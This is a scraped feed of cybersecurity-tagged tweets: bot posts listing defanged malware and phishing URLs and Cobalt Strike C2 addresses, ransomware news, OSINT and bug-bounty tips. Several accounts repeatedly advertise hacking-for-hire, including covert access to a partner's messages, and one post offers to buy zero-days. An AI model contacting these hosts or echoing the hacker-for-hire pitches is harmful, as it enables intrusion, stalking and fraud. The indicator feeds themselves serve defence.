ecarlesi: Threat on hxxps://9p[.]beauty/ #malware #nc -- ecarlesi
ecarlesi: Threat on hxxp://6f[.]boats/ #malware -- ecarlesi
ecarlesi: Threat on hxxp://8g[.]boats/ #malware #dynadot -- ecarlesi
ecarlesi: Threat on hxxps://3t[.]fishing/ #malware #dynadot -- ecarlesi
fe_tsoc: RT @noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxps://digitalbrick[.]com[.]cn/ IP: 155.94… -- fe_tsoc
fe_tsoc: RT @noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxps://nftshopping[.]com[.]cn/ IP: 155.94.… -- fe_tsoc
fe_tsoc: RT @noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxps://exsplor[.]com/ IP: 155.94.149.224 B… -- fe_tsoc
gdprAI: RT @MERconference: Bring your imagination and together we’ll explore new ideas as we #reimagineIG as a business imperative. https://t.co/… -- gdprAI
hivory1965: We have a ton of VIP military aircraft over the #CONUS no tracking the #China balloon over #Montana #Breaking… https://t.co/GmLuSFbI5M -- hivory1965
iBoostUp: iBoostUp Spyware Doctor cloud detected macOS #malware Adware.Pirrit in LaCiotat, France. #Infection was in a file… https://t.co/I1E8QfhTxd -- iBoostUp
jayeshmthakur: RT @Hanishhsharma: What is happening in today’s world these worthless thieves. #cybercrime #theft #fake #otp #Finance https://t.co/cCMNCgJD… -- jayeshmthakur
jayeshmthakur: RT @flaresystems: Cybercrime is costing the world an approximate $600 billion annually, nearly 1% of global GDP. Learn more about the commo… -- jayeshmthakur
ji75754506: RT @hacklido: 💠 Phone number OSINT: My methodology for investigations By @Dheerajydv19 🔗 https://t.co/twuQGWp8pD - - - # Tags - - - #cyb… -- ji75754506
ji75754506: RT @NandanLohitaksh: Bountystrike-sh It installs common bug bounty tools, performs recon scans and continous asset discovery https://t.co… -- ji75754506
ji75754506: RT @osintbear: OSINT with TorBot: An Overview of How to Use Instant Messaging for Anonymous Web Browsing https://t.co/45a4SsjI3U #OSINT -- ji75754506
kmscom6: What’s in store for #ransomware in 2023? @Kaspersky believes the next #WannaCry is just around the corner (via… https://t.co/MrFxPyFVmB -- kmscom6
lionhsu20131: RT @DailyOsint: If you need a fast and effective port scanner, You can try #RustScan, which is able to scan all ports in 3 seconds. https… -- lionhsu20131
MendozaJusto: RT @NandanLohitaksh: Tools and Techniques for Red Team / Penetration Testing https://t.co/S0ndoRyjGF #cybersecurity #infosec #hacking #bu… -- MendozaJusto
MERconference: Bring your imagination and together we’ll explore new ideas as we #reimagineIG as a business imperative.… https://t.co/OisGLH6DtK -- MERconference
MicroFocusSec: RT @Holger_in_MT: See how to identify current global trends in #cybercrime and learn how to defend against future attacks with @MicroFocusS… -- MicroFocusSec
MoarGood: RT @SI_FalconTeam: Proof of Concept: #Malware Delivery via #appx/#msix packages. In our test case we needed administrative permissions to i… -- MoarGood
Muhamma07454276: RT @NandanLohitaksh: Tools and Techniques for Red Team / Penetration Testing https://t.co/S0ndoRyjGF #cybersecurity #infosec #hacking #bu… -- Muhamma07454276
nobrowncow: #Government and #Education are one of the highest industries targetted by #Ransomware. If you're running an #IBMi r… https://t.co/pIY3yiJTJO -- nobrowncow
PhishPhashion: Rrraging! Final chance to go for bold. Page wore this Ksubi “Tigerrr Resort Shirt” in Toronto on 8/10/22, and it w… https://t.co/de3wEQ9yt9 -- PhishPhashion
PhishStats: new #phishing at hXXp://scozmeep-312[.]byethost33[.]com/ | 185[.]27[.]134[.]136 | United Kingdom | WILDCARD-AS Wild… https://t.co/Bc48cynJIM -- PhishStats
programmerjoke9: Twitter API request prices commensurate to a Cyber Truck. Fact or fiction?#100Daysofcode #javascript #programming… https://t.co/ButSDGSDqg -- programmerjoke9
PROPentest: RT @hetmehtaa: Awesome Tips And Tricks For IDOR ( $100/Day) 🔥 #Infosec #Idor #Security #Cyber #bugbounty https://t.co/GyYRr7dHuC -- PROPentest
rahul05ranjan: RT @programmerjoke9: Twitter API request prices commensurate to a Cyber Truck. Fact or fiction?#100Daysofcode #javascript #programming #dev… -- rahul05ranjan
rahul05ranjan: RT @021System: Memes of today #infosec #cybersecurity #cybersecuritytips #pentesting #hacker #informationsecurity #news #berita #technolog… -- rahul05ranjan
RegulationAsia: The @ION_Markets incident has forced firms to manually process #derivatives trades. #Ransomware gang #Lockbit has t… https://t.co/Ua9LCKArIu -- RegulationAsia
richardturrin: RT @efipm: 📌 2022 Biggest Year Ever For #Crypto Hacking @Chainalysis https://t.co/WjkEnNU3kf #cybercrime ✍️ Top victim 👉 #Defi &amp; Top hac… -- richardturrin
robhof: LockBit claims responsibility for ransomware attack on ION Trading https://t.co/zyzzrAi5FP via @SiliconANGLE #LockBit #ransomware #cyber -- robhof
RuOilTracker: 🇷🇺 -&gt; ? MINERVA ALICE Departed Primorsk with 110,000 tons of crude oil. Bound for Suez Canal #russianoil #osint… https://t.co/O086HxYRCJ -- RuOilTracker
sectest9: RT @programmerjoke9: Twitter API request prices commensurate to a Cyber Truck. Fact or fiction?#100Daysofcode #javascript #programming #dev… -- sectest9
sectest9: RT @DailyOsint: If you need a fast and effective port scanner, You can try #RustScan, which is able to scan all ports in 3 seconds. https… -- sectest9
sectest9: RT @kmscom6: What’s in store for #ransomware in 2023? @Kaspersky believes the next #WannaCry is just around the corner (via @securityweek).… -- sectest9
sectest9: RT @Its_D3f4lt: Intro to Defensive Security - I have just completed this room! Check it out: https://t.co/Hq4xGnx3xJ #tryhackme #security #… -- sectest9
sectest9: RT @021System: Memes of today #infosec #cybersecurity #cybersecuritytips #pentesting #hacker #informationsecurity #news #berita #technolog… -- sectest9
sectest9: RT @robhof: LockBit claims responsibility for ransomware attack on ION Trading https://t.co/zyzzrAi5FP via @SiliconANGLE #LockBit #ransomwa… -- sectest9
sectest9: RT @MSM_Marketplace: @KordaMentha has released its cyber security predictions for 2023, Cyber in 2023: Evolving Threats and Resilience. Dow… -- sectest9
sectest9: RT @flaresystems: Cybercrime is costing the world an approximate $600 billion annually, nearly 1% of global GDP. Learn more about the commo… -- sectest9
StanleyEpstein: Cybersecurity and privacy tips you can teach your 5+-year-old #Cybersecurity #ransomware #security via… https://t.co/tcE6wYoNy1 -- StanleyEpstein
take_gattcha: RT @vulnpoint: Would you like to participate in BugBounty? Does $10,000 sound too low? We're prepared to offer you a unique reward offer f… -- take_gattcha
Tarlinan: RT @AllForOsint: Hey #OSINT, PeakFinder is an app that shows a 360° panoramic view from an arbitrary viewpoint of your choice. To render th… -- Tarlinan
Tere3452: RT @DailyOsint: If you need a fast and effective port scanner, You can try #RustScan, which is able to scan all ports in 3 seconds. https… -- Tere3452
vizivod: MalBuster - I have just completed this room! Check it out: https://t.co/hmm9PvlbgV #tryhackme #security #malware… https://t.co/SenNCJbJli -- vizivod
CSIRT_Telconet: CISCO ha publicado actualizaciones de seguridad para corregir una vulnerabilidad de alta gravedad, identificada como CVE-2023-20076 con puntuación CVSS de 7.2 Más información: https://t.co/JgkfpQlSAu https://t.co/wAvyg5WwNy -- CSIRT_Telconet
CSIRT_Telconet: Falla de RCE de gravedad crítica encontrada en la librería PHP Dompdf Se ha revelado una vulnerabilidad de alta gravedad en la librería PHP Dompdf de código abierto. Más información: https://t.co/iOXZXW0Voc https://t.co/LAqLsT1iCj -- CSIRT_Telconet
AJEM_mx: RT @NandanLohitaksh: Tools and Techniques for Red Team / Penetration Testing https://t.co/S0ndoRyjGF #cybersecurity #infosec #hacking #bu… -- AJEM_mx
AliceAn0025: RT @RESecurity: Resecurity® has identified a relatively new #ransomware family called “Nevada Ransomware”. On February 1st, the operators b… -- AliceAn0025
BanyanSecurity: Listen to our "Get It Started. Get It Done" podcast with FBI Special Agent, Scott Hellman, who has been investigati… https://t.co/x8sltWIh77 -- BanyanSecurity
CyberDFIR: RT @ChrisSh4281533: According to Coalition, #cyber threats will increase dramatically over the next year. https://t.co/s6P4amfPw4 #cyberris… -- CyberDFIR
cybernewslive: Have you been a victim of sextortion? #CNL #CyberNewsLive #Cyber #CyberSecurity #CyberSecurityNews #CyberCrime… https://t.co/E3PMBwe75k -- cybernewslive
CyberSecurityN8: RT @programmerjoke9: I know just enough BASIC to understand this joke in Futurama#100Daysofcode #javascript #programming #dev #linux #java… -- CyberSecurityN8
CyberSecurityN8: RT @cybernewslive: Have you been a victim of sextortion? #CNL #CyberNewsLive #Cyber #CyberSecurity #CyberSecurityNews #CyberCrime #CyberA… -- CyberSecurityN8
hntrZz: RT @bugbounty0: Bypass firewalls with of-CORs and typo-squatting #bugbounty #bugbountytip #infosec #bugbountytips https://t.co/MaWNLiZSWN -- hntrZz
hwalkerCA: Bye Excel and Word, hello MSFT Virtual Studio. #socialengineering #phishing #malware #ransomware #cybersecurity… https://t.co/2VsUmDASPe -- hwalkerCA
javascriptd: RT @programmerjoke9: I know just enough BASIC to understand this joke in Futurama#100Daysofcode #javascript #programming #dev #linux #java… -- javascriptd
KnutarMike: RT @NandanLohitaksh: Tools and Techniques for Red Team / Penetration Testing https://t.co/S0ndoRyjGF #cybersecurity #infosec #hacking #bu… -- KnutarMike
mrleprecha1: RT @RootxRavi: Just scored a 4 Digit Bounty on @YogoshaOfficial 1 : Get all the URL from wayback / Gau 2 : Filter out the js file using… -- mrleprecha1
platinait: Cybersecurity and privacy tips you can teach your 5+-year-old https://t.co/j1XA3vbaTS #kalilinux #ransomware… https://t.co/Zz7i721eUm -- platinait
PolicyWriters: What is Cyber Essentials? Deep dive into Cyber Essentials certification, its history, the scope of requirements, re… https://t.co/zaxAtgGmFo -- PolicyWriters
programmerjoke9: When a coworker tries to get me to use a tool that takes a few minutes to set up but also makes everyone’s job easi… https://t.co/6PEldhJaR1 -- programmerjoke9
rahul05ranjan: RT @programmerjoke9: When a coworker tries to get me to use a tool that takes a few minutes to set up but also makes everyone’s job easier… -- rahul05ranjan
sectest9: RT @saharakerala: Penetration testing and ethical hacking skills can help you detect and respond to cloud security threats—&amp; take your care… -- sectest9
sectest9: RT @bugbounty0: Bypass firewalls with of-CORs and typo-squatting #bugbounty #bugbountytip #infosec #bugbountytips https://t.co/MaWNLiZSWN -- sectest9
sectest9: RT @cybernewslive: Have you been a victim of sextortion? #CNL #CyberNewsLive #Cyber #CyberSecurity #CyberSecurityNews #CyberCrime #CyberA… -- sectest9
sectest9: RT @BanyanSecurity: Listen to our "Get It Started. Get It Done" podcast with FBI Special Agent, Scott Hellman, who has been investigating #… -- sectest9
sectest9: RT @programmerjoke9: When a coworker tries to get me to use a tool that takes a few minutes to set up but also makes everyone’s job easier… -- sectest9
SpixnetG: Spain, the third country in the world with the most cyberattacks on companies#cyber2security #cybercrime #Cybernews… https://t.co/W5CImC6lqa -- SpixnetG
beefyspace: RT @Experthac_Gary1: Is mandatory password expiration helping or hurting your password security? #DataSecurity #Privacy #100DaysOfCode #Clo… -- beefyspace
beefyspace: RT @noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxp://advancity[.]ro/cbs/ IP: 173.249.16.6… -- beefyspace
Boomersaurus: 🇺🇸Shoot It DOWN! 🇨🇳🗑️🎈 #RussiaIsLosing #UkraineRussiaWar #Anonymous #FckPutin #NAFO #Fellas #StandWithUkraine… https://t.co/npDqLKYVX5 -- Boomersaurus
CyberDFIR: RT @CYRISMA_USA: Get an estimate of the financial impact of a potential breach based on the value of your data and infrastructure assets, a… -- CyberDFIR
CyberDFIR: RT @GDPR123: Microsoft's security team says it's tracking over 100 #ransomware actors https://t.co/E1wuZjm1aT #Microsoft #Security #ThreatA… -- CyberDFIR
CyberDFIR: RT @GDPR123: Arnold Clark customer data stolen in attack claimed by Play #ransomware https://t.co/JOuVGtnGOW #RansomwareAttack #ArnoldClar… -- CyberDFIR
CyberNotice_: The LockBit ransomware gang has claimed responsibility for a cyberattack on ION Group - affecting it's derivatives… https://t.co/ZKdvHiJ40s -- CyberNotice_
CyberSecurityN8: RT @noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxp://advancity[.]ro/cbs/ IP: 173.249.16.6… -- CyberSecurityN8
Experthac_Gary1: Is mandatory password expiration helping or hurting your password security? #DataSecurity #Privacy #100DaysOfCode… https://t.co/WvGeTUCwdx -- Experthac_Gary1
HealthISAC: February Newsletter features: APAC Summit - Registration &amp; Agenda * Prague Workshop Recap * Spring Americas Summit CFP * Member Service Spotlight HITS * European Workshop / Hobby Exercise in Ireland * Podcast #medicaldevices and 3rd Pa -- HealthISAC
LuizHSBrandao: RT @technisette: https://t.co/epa3X1MVN0 Easy way to get familiar with OSINT is to take a course. And @myosinttrainer has some great online… -- LuizHSBrandao
OSINT_Tactical: Many Twitter OSINT tools are going to break very soon. #OSINT https://t.co/gjLaMJPogp -- OSINT_Tactical
RedPacketSec: Malware Analysis - discovery - 48bd13124e15e6ec091c8eb70947c688 - https://t.co/xZwVXVjKIc #Malware #OSINT #ThreatIntel #discovery -- RedPacketSec
RedPacketSec: Malware Analysis - discovery - 4b5e6946b2a1a382403af9dbbcbe384a - https://t.co/K6OkMXoXeN #Malware #OSINT #ThreatIntel #discovery -- RedPacketSec
RedPacketSec: Malware Analysis - discovery - 1badb991805bba70d8cf2961df21a758 - https://t.co/dpIAGqXyGn #Malware #OSINT #ThreatIntel #discovery -- RedPacketSec
RedPacketSec: Malware Analysis - ransomware - ed08a4ce55f8dfa13b49e719ca73e8e5 - https://t.co/bORFjx1Nku #Malware #OSINT #ThreatIntel #ransomware -- RedPacketSec
RedPacketSec: Malware Analysis - lockbit - e86b8eff6d47b0f5a9a42215562e77b9 - https://t.co/mqcqtdWUuW #Malware #OSINT #ThreatIntel #lockbit -- RedPacketSec
RedPacketSec: Cobalt Stike Beacon Detected - 101[.]43[.]16[.]149:80 - https://t.co/gbVD4QIM1J #CobaltStrikeBeaconDetected #OSINT #ThreatIntel -- RedPacketSec
RedPacketSec: Malware Analysis - lockbit - 98b55e5cb7d0c6006dd201c9734aa59b - https://t.co/mQpxdO5rsz #Malware #OSINT #ThreatIntel #lockbit -- RedPacketSec
RedPacketSec: Cobalt Stike Beacon Detected - 156[.]255[.]2[.]132:8003 - https://t.co/L85irSxzml #CobaltStrikeBeaconDetected #OSINT #ThreatIntel -- RedPacketSec
RedPacketSec: Malware Analysis - lockbit - c348a516d5880cc81ff35057fec1611b - https://t.co/3kn41PLqCX #Malware #OSINT #ThreatIntel #lockbit -- RedPacketSec
RedPacketSec: Cobalt Stike Beacon Detected - 52[.]39[.]206[.]235:443 - https://t.co/o3117Xw2xY #CobaltStrikeBeaconDetected #OSINT #ThreatIntel -- RedPacketSec
RedPacketSec: Malware Analysis - lockbit - 494535c9a7f6a4b98e241664cba68b49 - https://t.co/WNtU39BCMX #Malware #OSINT #ThreatIntel #lockbit -- RedPacketSec
RedPacketSec: Cobalt Stike Beacon Detected - 43[.]156[.]232[.]7:2087 - https://t.co/29k4v15qIz #CobaltStrikeBeaconDetected #OSINT #ThreatIntel -- RedPacketSec
RedPacketSec: Cobalt Stike Beacon Detected - 109[.]172[.]45[.]77:443 - https://t.co/QdKX5u5pmj #CobaltStrikeBeaconDetected #OSINT #ThreatIntel -- RedPacketSec
RedPacketSec: Cobalt Stike Beacon Detected - 39[.]107[.]242[.]125:80 - https://t.co/JOc0aOYADc #CobaltStrikeBeaconDetected #OSINT #ThreatIntel -- RedPacketSec
RedPacketSec: Cobalt Stike Beacon Detected - 120[.]46[.]212[.]231:80 - https://t.co/YrEqSkhey4 #CobaltStrikeBeaconDetected #OSINT #ThreatIntel -- RedPacketSec
RedPacketSec: Cobalt Stike Beacon Detected - 83[.]217[.]11[.]21:443 - https://t.co/KT1oVVYmyE #CobaltStrikeBeaconDetected #OSINT #ThreatIntel -- RedPacketSec
RedPacketSec: Cobalt Stike Beacon Detected - 101[.]35[.]240[.]32:80 - https://t.co/sqUBoRBdoF #CobaltStrikeBeaconDetected #OSINT #ThreatIntel -- RedPacketSec
RedPacketSec: Cobalt Stike Beacon Detected - 120[.]48[.]99[.]90:443 - https://t.co/t3JfkUW519 #CobaltStrikeBeaconDetected #OSINT #ThreatIntel -- RedPacketSec
sectest9: RT @Experthac_Gary1: Is mandatory password expiration helping or hurting your password security? #DataSecurity #Privacy #100DaysOfCode #Clo… -- sectest9
sectest9: RT @noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxps://login[.]sharepoint[.]brinkshomesecu… -- sectest9
swiftt_hack: #hacking #recovery #robloxdown #hack #cybersecurity If your Roblox is hacked, all hacking services are available t… https://t.co/lx2SoT2YsJ -- swiftt_hack
swiftt_hack: You want to access your partner's calls, text messages and deleted conversations on any social media account withou… https://t.co/c3SzmpM0qc -- swiftt_hack
swiftt_hack: Send in your Hacking Issues and get Real Solution Fast I'm available 24/7 #hacking #twitterdown #facebookdown… https://t.co/Z5mmljiRRl -- swiftt_hack
swiftt_hack: Working on Everybody's Reported Cases Send in your Hacking Issues and get Real Solution Fast I'm available 24/7… https://t.co/ifXAYUhg3T -- swiftt_hack
CSIRT_Telconet: Nueva Prueba de Concepto (PoC) para la vulnerabilidad VMware vRealize Log Insight. Más información en: https://t.co/73Inm3d9pu https://t.co/QIhG6sDFli -- CSIRT_Telconet
1000dayscodingb: RT @williamstyles23: Randomizing the seed code for the template dynamically changes all of the users entry code values &amp; round results. @F… -- 1000dayscodingb
3XS0: 8 strange ways emproyees can (accidently) expose data #DataSecurity #Privacy #100DaysOfCode #CloudSecurity… https://t.co/Iao9N5WQV4 -- 3XS0
Aaannttookk: RT @three_cube: Tracking the Target Through Cyberspace! OSINT: Finding the Same Username across Multiple Platforms #osint #osint4hackers #… -- Aaannttookk
AboutHacking: Writing Burp Suite Extension in Python – Part 2 https://t.co/A5j69Og90q #informationsecurity #bugbountytip… https://t.co/EXhCo5dDxv -- AboutHacking
AF15x: RT @M7moud_mk99: Fuzzing on 403 subdomains ~ #bugbountytip #BugBounty https://t.co/6fipKF1DiM -- AF15x
alternative200: RT @Grepnetics: Is mandatory password expiration helping or hurting your password security? #DataSecurity #Privacy #100DaysOfCode #CloudSec… -- alternative200
alternative200: RT @MyFiscalFitness: Common Types Of Cyber Attacks And How To Help Prevent Them https://t.co/us8Qn06fY9 #CyberAttacks #CyberAttack #CyberC… -- alternative200
andrewmorrisuk: RT @magicfingha_ck: Text me now for any hacking or bypass Active 24/7 Upgrade and Account Recoveries. #cybercrime #programmer #malware #cy… -- andrewmorrisuk
andrewmorrisuk: RT @IncruxTech: The looming threat of ransomware (Infographic). #Infosec #CyberSecurity #CyberAttack #Hacking #Privacy #Threat #Malware #R… -- andrewmorrisuk
ARealHumanName1: RT @programmerjoke9: He is very conservative...#100Daysofcode #javascript #programming #dev #linux #java #programming #CodeNewbie #python #… -- ARealHumanName1
austincurtools: We offer exclusive Hacking&amp;recovery services write me for hacking services. #hacked #icloud #facebookdown #imessage… https://t.co/UHbz6pgVVL -- austincurtools
austincurtools: We offer exclusive Hacking&amp;recovery services write me for hacking services. #hacked #icloud #facebookdown #imessage… https://t.co/m6gsSqrgKq -- austincurtools
austincurtools: We offer exclusive Hacking&amp;recovery services write me for hacking services. #hacked #icloud #facebookdown #imessage… https://t.co/gEA3qObH9L -- austincurtools
austincurtools: We offer exclusive Hacking&amp;recovery services write me for hacking services. #hacked #icloud #facebookdown #imessage… https://t.co/x4gPutUsoP -- austincurtools
austincurtools: We offer exclusive Hacking&amp;recovery services write me for hacking services. #hacked #icloud #facebookdown #imessage… https://t.co/aX35JEHy3Y -- austincurtools
austincurtools: We offer exclusive Hacking&amp;recovery services write me for hacking services. #hacked #icloud #facebookdown #imessage… https://t.co/d6P4QgheFj -- austincurtools
austincurtools: We offer exclusive Hacking&amp;recovery services write me for hacking services. #hacked #icloud #facebookdown #imessage… https://t.co/7vTGiUNUzw -- austincurtools
bablusingh964: RT @disclosedh1: Shopify disclosed a bug submitted by kannthu: https://t.co/mDH56uKleU - Bounty: $9,400 #hackerone #bugbounty https://t.co/… -- bablusingh964
beefyspace: RT @AboutHacking: Writing Burp Suite Extension in Python – Part 2 https://t.co/A5j69Og90q #informationsecurity #bugbountytip #security #cyb… -- beefyspace
beefyspace: RT @voldimmoral: @breachsense @DarknetDiaries @MaliciousLife @SmashinSecurity @thecyberwire @riskydotbiz @SecWeekly @SCWpod @TWiT @ClickHer… -- beefyspace
BrendanDuRoss: RT @anyrun_app: 1/2 #Malware spreads via Malicious OneNote attachments To infect the system, users need to download malspam, open it, and… -- BrendanDuRoss
CheckPointSW: Nearly 50% of CISOs and CIOs rank #phishing as their #1 #cybersecurity concern. Discover 15 #emailsecurity risks an… https://t.co/zP3DgMy4XP -- CheckPointSW
Crypt0_b0y: RT @NandanLohitaksh: Tools and Techniques for Red Team / Penetration Testing https://t.co/S0ndoRyjGF #cybersecurity #infosec #hacking #bu… -- Crypt0_b0y
CyberSecPlace: RT @3XS0: 8 strange ways emproyees can (accidently) expose data #DataSecurity #Privacy #100DaysOfCode #CloudSecurity #MachineLearning #Phi… -- CyberSecPlace
CyberSecurityN8: RT @magicfingha_ck: Text me now for any hacking or bypass Active 24/7 Upgrade and Account Recoveries. #cybercrime #programmer #malware #cy… -- CyberSecurityN8
CyberSecurityN8: RT @Experthac_Gary1: If you need Help with recovering any Account, Mails, Tiktok, Snapchat, Instagram etc.. I'm available 24/7 Inbox me #… -- CyberSecurityN8
CyberSecurityN8: RT @Lance_Edelman: As #SocialEngineering Tactics Change, So Must Your #Security Training - https://t.co/cRi2sfMyyR #cybersecurity #cybercri… -- CyberSecurityN8
CyberSecurityN8: RT @IncruxTech: The looming threat of ransomware (Infographic). #Infosec #CyberSecurity #CyberAttack #Hacking #Privacy #Threat #Malware #R… -- CyberSecurityN8
CyberSecurityN8: RT @voldimmoral: @breachsense @DarknetDiaries @MaliciousLife @SmashinSecurity @thecyberwire @riskydotbiz @SecWeekly @SCWpod @TWiT @ClickHer… -- CyberSecurityN8
CyberSecurityN8: RT @3XS0: 8 strange ways emproyees can (accidently) expose data #DataSecurity #Privacy #100DaysOfCode #CloudSecurity #MachineLearning #Phi… -- CyberSecurityN8
CyberSecurityN8: RT @anyrun_app: 1/2 #Malware spreads via Malicious OneNote attachments To infect the system, users need to download malspam, open it, and… -- CyberSecurityN8
cybsecbot: RT @Malwar3Ninja: [https://t.co/otlIKKsWhQ] 🕵️‍♂️Malware #Vidar using #TikTok as C2 ⚙️https://t.co/iFCLH361fP ⚠️ C2: 95.216.178[.]160 #Th… -- cybsecbot
de3ev: RT @James_inthe_box: A csv formatted list of #malspam campaigns that crossed my path in January to include hash, c2, subject, and email exf… -- de3ev
edisonjscode: RT @3XS0: 8 strange ways emproyees can (accidently) expose data #DataSecurity #Privacy #100DaysOfCode #CloudSecurity #MachineLearning #Phi… -- edisonjscode
Experthac_Gary1: If you need Help with recovering any Account, Mails, Tiktok, Snapchat, Instagram etc.. I'm available 24/7 Inbox m… https://t.co/EgzwCxsaAT -- Experthac_Gary1
Experthac_Gary1: Hacking is way Easier when you contact the right hacker. Inbox me now for all your hacking services I'm always av… https://t.co/cSqW72SZob -- Experthac_Gary1
fablesudiste: RT @three_cube: Open Source Intelligence (OSINT): Finding Email Passwords in Dumps with h8mail #osint #h8mail #infosec #cybersecurity #cybe… -- fablesudiste
FCC: RT @StaySafeOnline: Thursday Tip: Keep all software on internet connected devices – including personal computers, smartphones and tablets –… -- FCC
FSISAC: We are pleased to unveil the agenda for our Americas Spring Summit. Don't miss out on learning about the key cybersecurity and business trends of 2023 for the financial services sector directly from your fincyber peers. Register now: https://t.co/ -- FSISAC
globaljeff: RT @SamuraiXDR: Can you list some forms of Open Source Intelligence (OSINT)? Hint: You're on one right now. Learn all about OSINT and how t… -- globaljeff
KhatunaMs: RT @TheHackersNews: Ukraine has warned about new strains of GammaLoad and GammaSteel #malware that Russian-sponsored hackers are using in e… -- KhatunaMs
LehtmanMaria: Why we need global rules to crack down on cybercrime The cost of #cybercrime could be $10.5 trillion annually by 20… https://t.co/KowHM54gtR -- LehtmanMaria
madjid_tehrani: RT @dsszzi: 🧐 The SSSCIP’s State Cyber Defense Center experts have analyzed the GammaLoad and GammaSteel #spyware used by the UAC-0010 (Gam… -- madjid_tehrani
magicfingha_ck: Text me now for any hacking or bypass Active 24/7 Upgrade and Account Recoveries. #cybercrime #programmer #malware… https://t.co/1lUT9TOqyL -- magicfingha_ck
MF_TommasoG: Most #ThreatIntelligence leaves you with a wealth of information but little to no intel on how these threats are af… https://t.co/YeB747TTGG -- MF_TommasoG
Peter_Gilheany: RT @Netenrich: In many ways, the #cybercrime ecosystem has developed specialized ‘career fields’ in a similar way that cybersecurity has de… -- Peter_Gilheany
PHaRTnONu: RT @three_cube: Tracking the Target Through Cyberspace! OSINT: Finding the Same Username across Multiple Platforms #osint #osint4hackers #… -- PHaRTnONu
programmerjoke9: He is very conservative...#100Daysofcode #javascript #programming #dev #linux #java #programming #CodeNewbie… https://t.co/lQUCRBpwfX -- programmerjoke9
rahul05ranjan: RT @programmerjoke9: He is very conservative...#100Daysofcode #javascript #programming #dev #linux #java #programming #CodeNewbie #python #… -- rahul05ranjan
RDSWEB: RT @voldimmoral: @breachsense @DarknetDiaries @MaliciousLife @SmashinSecurity @thecyberwire @riskydotbiz @SecWeekly @SCWpod @TWiT @ClickHer… -- RDSWEB
sectest9: RT @Lance_Edelman: As #SocialEngineering Tactics Change, So Must Your #Security Training - https://t.co/cRi2sfMyyR #cybersecurity #cybercri… -- sectest9
sectest9: RT @programmerjoke9: He is very conservative...#100Daysofcode #javascript #programming #dev #linux #java #programming #CodeNewbie #python #… -- sectest9
sectest9: RT @magicfingha_ck: Text me now for any hacking or bypass Active 24/7 Upgrade and Account Recoveries. #cybercrime #programmer #malware #cy… -- sectest9
sectest9: RT @voldimmoral: @breachsense @DarknetDiaries @MaliciousLife @SmashinSecurity @thecyberwire @riskydotbiz @SecWeekly @SCWpod @TWiT @ClickHer… -- sectest9
tuskini: RT @DailyOsint: If you need a fast and effective port scanner, You can try #RustScan, which is able to scan all ports in 3 seconds. https… -- tuskini
Vennilou: RT @three_cube: Open Source Intelligence (OSINT): Finding Email Passwords in Dumps with h8mail #osint #h8mail #infosec #cybersecurity #cybe… -- Vennilou
whodatlauren: RT @USCyberMag: Usman Choudhary of @VIPRESecurity explains the causes of #cybersecurity professional burnout, why burnout matters for prote… -- whodatlauren
0xJin: YaY! Found a CRITICAL Vulnerability on @intigriti Reward $$$$ So much details when they Fix the Vuln . #bugbounty… https://t.co/8pBihh7XoG -- 0xJin
bnbnIT: RT @vulnpoint: Consider yourself an expert in zero-day vulnerabilities? Follow us! We are ready to purchase your zero-day vulnerability a… -- bnbnIT
cyberGoatPsyOps: RT @threathuntergrl: Happy Tuesday everyone! The Mighty Threat Intelligence Warrior is available here ➡️ https://t.co/FLbI9ZmWQh Free Prin… -- cyberGoatPsyOps
CyberSecurityN8: RT @DaveTech_best: Connecting to the right hackers makes hacking much easier. Email us now for all hacking services We are always availab… -- CyberSecurityN8
CyberSecurityN8: RT @NonprofitGood: Breach hits GoTo, the parent company of LastPass https://t.co/GRX6vM1kus #efani #StopTracking #BTC #Solar #GrantsAvaila… -- CyberSecurityN8
CyberSecurityN8: RT @hetmehtaa: Disclosing Facebook page admins by playing a game 🎲 #Facebook #Infosec #Hacking #TheSecureEdge #Bugbounty https://t.co/R8w… -- CyberSecurityN8
databreach9111: RT @DaveHatter: #Tech Friday returns to @55KRC tomorrow at 6:30 AM, join host @brianthomas1 and me for timely #technology news and tips. Li… -- databreach9111
DaveHatter: #Tech Friday returns to @55KRC tomorrow at 6:30 AM, join host @brianthomas1 and me for timely #technology news and… https://t.co/TquLtVS2DW -- DaveHatter
DaveTech_best: Connecting to the right hackers makes hacking much easier. Email us now for all hacking services We are always av… https://t.co/0BCWI7SSU3 -- DaveTech_best
DaveTech_best: We are available 24/7 inbox and smile #hacking #facebookdown #whatspp #hackedinstagram #twitterdown… https://t.co/FtWsZnkRjU -- DaveTech_best
DaveTech_best: Need help recovering hacked accounts, emails, Tiktok, Snapchat, Instagram, and more. Online 24/7 Please send me a… https://t.co/s5XNbpPegT -- DaveTech_best
devinatheart: Some of y’all really do need to learn how to steal shit I’m so serious Commit some #cybercrime like a normal person https://t.co/3OLaeQAAPS -- devinatheart
EricHacksThings: RT @NandanLohitaksh: Tools and Techniques for Red Team / Penetration Testing https://t.co/S0ndoRyjGF #cybersecurity #infosec #hacking #bu… -- EricHacksThings
GeoPioneerInc: Kherson region comes under Russian fire #Ukraine #OSINT https://t.co/DhWZHKLxRt -- GeoPioneerInc
hetmehtaa: RT @hetmehtaa: The Ultimate OSINT Collection - 🔗https://t.co/cLIVSti86i #infosec #forensics #OSINT #TheSecureEdge https://t.co/7DuI6DeBj2 -- hetmehtaa
Infoblox: It's probably a scam. Infoblox Cyber Intelligence Group observes distribution of phishing lookalikes through fake s… https://t.co/K91p7nZbLz -- Infoblox
jamesvgingerich: RT @davidbombal: Ethical hacker jailed for doing good? YouTube video: https://t.co/uSO7myRRPZ #cyber #hack #hacking #hacker #cybercrime… -- jamesvgingerich
jcoasugo: RT @KiranParmar1255: Sqlmap Mindmap @sqlmap https://t.co/1Tc1BwqTgW… #infosec #cybersecurity #cybersecuritytips #pentesting #oscp #redt… -- jcoasugo
kevtownsend: RT @Netenrich: In many ways, the #cybercrime ecosystem has developed specialized ‘career fields’ in a similar way that cybersecurity has de… -- kevtownsend
